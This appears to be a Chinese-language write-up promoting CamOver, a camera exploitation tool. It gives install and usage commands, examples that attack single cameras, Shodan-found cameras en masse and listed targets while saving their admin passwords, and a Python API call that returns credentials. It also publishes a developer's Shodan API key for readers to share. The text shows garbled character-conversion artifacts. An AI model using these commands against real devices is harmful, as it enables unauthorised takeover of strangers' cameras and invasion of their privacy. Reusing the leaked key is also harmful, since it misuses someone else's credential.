CamOver:一款功能強(qiáng)大的攝像頭漏洞利用工具
關(guān)于CamOver
CamOver是一款功能強(qiáng)大的攝像頭漏洞利用工具,在該工具的幫助下,廣大研究人員可以輕松破解掉你家網(wǎng)絡(luò)攝像頭的管理員密碼,并接管你的攝像頭。
功能介紹
- 該工具能夠發(fā)現(xiàn)并利用大多數(shù)主流型號(hào)網(wǎng)絡(luò)攝像頭中的安全漏洞,例如CCTV、GoAhead和Netwave等。
- 經(jīng)過(guò)優(yōu)化,支持多線程同時(shí)攻擊多個(gè)攝像頭。
- 簡(jiǎn)單的命令行接口和API用法。
工具安裝
由于CamOver使用Python3開(kāi)發(fā),因此首先需要在本地設(shè)備上安裝并配置好Python3環(huán)境。接下來(lái),廣大研究人員可以使用下列命令下載并安裝CamOver:
- pip3 install git+https://github.com/EntySec/CamOver
基礎(chǔ)使用
CamOver的使用非常簡(jiǎn)單,我們只需要在命令行終端中輸入“camover”命令即可使用CamOver:
- usage: camover [-h] [-t] [-o OUTPUT] [-i INPUT] [-a ADDRESS] [--shodan SHODAN]
- [--zoomeye ZOOMEYE] [-p PAGES]
- CamOver is a camera exploitation tool that allows to disclosure network camera
- admin password.
- optional arguments:
- -h, --help 顯示這個(gè)幫助信息并退出
- -t, --threads 啟用多線程模式以獲得更好的性能
- -o OUTPUT, --output OUTPUT
- 將結(jié)果存儲(chǔ)至文件
- -i INPUT, --input INPUT
- 地址輸入文件
- -a ADDRESS, --address ADDRESS
- 提供單個(gè)地址
- --shodan SHODAN 通過(guò)網(wǎng)絡(luò)利用遠(yuǎn)程設(shè)備所使用的Shodan API密鑰
- --zoomeye ZOOMEYE 通過(guò)網(wǎng)絡(luò)利用遠(yuǎn)程設(shè)備所使用的ZoomEye API密鑰
- -p PAGES, --pages PAGES
- 需要通過(guò)ZoomEye獲取的頁(yè)面數(shù)量
工具使用樣例
(1) 攻擊單個(gè)攝像頭
下列命令可以攻擊單個(gè)網(wǎng)絡(luò)攝像頭:
- camover -a 192.168.99.100
(2) 通過(guò)網(wǎng)絡(luò)攻擊遠(yuǎn)程攝像頭
接下來(lái),我們可以使用Shodan搜索引擎來(lái)搜索并攻擊網(wǎng)絡(luò)上的攝像頭,此時(shí)我們可以使用-t參數(shù)來(lái)設(shè)置多線程數(shù)量以獲得更好的性能:
- camover -t --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD
注意:項(xiàng)目中給出的Shodan API密鑰(PSKINdQe1GyxGgecYz2191H2JoS9qvgD)是開(kāi)發(fā)人員自己的專業(yè)版API密鑰,你可以使用你自己的密鑰,當(dāng)然了你想用開(kāi)發(fā)人員的也沒(méi)意見(jiàn),大家資源共享嘛!
(3) 從輸入文件獲取目標(biāo)攝像頭
我們還可以使用開(kāi)放數(shù)據(jù)庫(kù)中提供的攝像頭地址,此時(shí)我們可以使用-t參數(shù)來(lái)設(shè)置多線程數(shù)量以獲得更好的性能:
- camover -t -i cameras.txt -o passwords.txt
注意:此命令將會(huì)攻擊cameras.txt中給出的所有攝像頭,并會(huì)將所有獲取到的密碼存儲(chǔ)至passwords.txt文件中。
API使用
CamOver還提供了自己的Python API,可以將其導(dǎo)入至你們自己的項(xiàng)目代碼中并調(diào)用其功能:
- from camover import CamOver
調(diào)用樣例
攻擊單個(gè)攝像頭:
- from camover import CamOver
- camover = CamOver()
- creds = camover.exploit('192.168.99.100')
- print(creds)
項(xiàng)目地址
CamOver:【GitHub傳送門】